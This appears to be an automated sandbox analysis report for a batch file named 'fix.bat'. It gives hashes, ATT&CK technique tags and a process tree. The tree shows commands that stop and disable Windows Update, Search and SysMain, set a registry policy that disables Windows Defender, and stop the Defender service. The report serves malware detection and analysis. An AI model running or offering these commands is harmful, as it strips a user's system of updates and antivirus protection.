1b409fcfd4480085fc4ae1125c358a2637084eb4133ac97353ab982c85029254

Analysis

max time kernel
120s
max time network
125s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
27-05-2024 12:24

Target

fix.bat
Size

526B
MD5

09c8df73c596e42192d21911d35c9ec4
SHA1

c6caa0111023bf4aca8ff072c9f8c86b100922bf
SHA256

1b409fcfd4480085fc4ae1125c358a2637084eb4133ac97353ab982c85029254
SHA512

f64cf91fb03e805784790096e00b3e844446e504b2bbdf40fff70461b025bfe62cfc73a00466b0fc7fb73018f2237a5450345a65af026078456238f2a71c991e

Score

8^/10

evasion execution

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 2236 wrote to memory of 848	2236	cmd.exe	29
PID 2236 wrote to memory of 848	2236	cmd.exe	29
PID 2236 wrote to memory of 848	2236	cmd.exe	29
PID 2236 wrote to memory of 2152	2236	cmd.exe	30
PID 2236 wrote to memory of 2152	2236	cmd.exe	30
PID 2236 wrote to memory of 2152	2236	cmd.exe	30
PID 2236 wrote to memory of 2296	2236	cmd.exe	31
PID 2236 wrote to memory of 2296	2236	cmd.exe	31
PID 2236 wrote to memory of 2296	2236	cmd.exe	31
PID 2236 wrote to memory of 2240	2236	cmd.exe	32
PID 2236 wrote to memory of 2240	2236	cmd.exe	32
PID 2236 wrote to memory of 2240	2236	cmd.exe	32
PID 2236 wrote to memory of 2820	2236	cmd.exe	33
PID 2236 wrote to memory of 2820	2236	cmd.exe	33
PID 2236 wrote to memory of 2820	2236	cmd.exe	33
PID 2236 wrote to memory of 2832	2236	cmd.exe	34
PID 2236 wrote to memory of 2832	2236	cmd.exe	34
PID 2236 wrote to memory of 2832	2236	cmd.exe	34
PID 2236 wrote to memory of 2880	2236	cmd.exe	35
PID 2236 wrote to memory of 2880	2236	cmd.exe	35
PID 2236 wrote to memory of 2880	2236	cmd.exe	35
PID 2236 wrote to memory of 2872	2236	cmd.exe	36
PID 2236 wrote to memory of 2872	2236	cmd.exe	36
PID 2236 wrote to memory of 2872	2236	cmd.exe	36
PID 2872 wrote to memory of 1388	2872	net.exe	37
PID 2872 wrote to memory of 1388	2872	net.exe	37
PID 2872 wrote to memory of 1388	2872	net.exe	37

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\fix.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2236
- C:\Windows\system32\sc.exe
  sc stop wuauserv
  2⤵
  - Launches sc.exe
  PID:848
- C:\Windows\system32\sc.exe
  sc config wuauserv start=disabled
  2⤵
  - Launches sc.exe
  PID:2152
- C:\Windows\system32\sc.exe
  sc stop WSearch
  2⤵
  - Launches sc.exe
  PID:2296
- C:\Windows\system32\sc.exe
  sc config WSearch start=disabled
  2⤵
  - Launches sc.exe
  PID:2240
- C:\Windows\system32\sc.exe
  sc stop SysMain
  2⤵
  - Launches sc.exe
  PID:2820
- C:\Windows\system32\sc.exe
  sc config SysMain start=disabled
  2⤵
  - Launches sc.exe
  PID:2832
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:2880
- C:\Windows\system32\net.exe
  net stop WinDefend
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop WinDefend
    3⤵
    PID:1388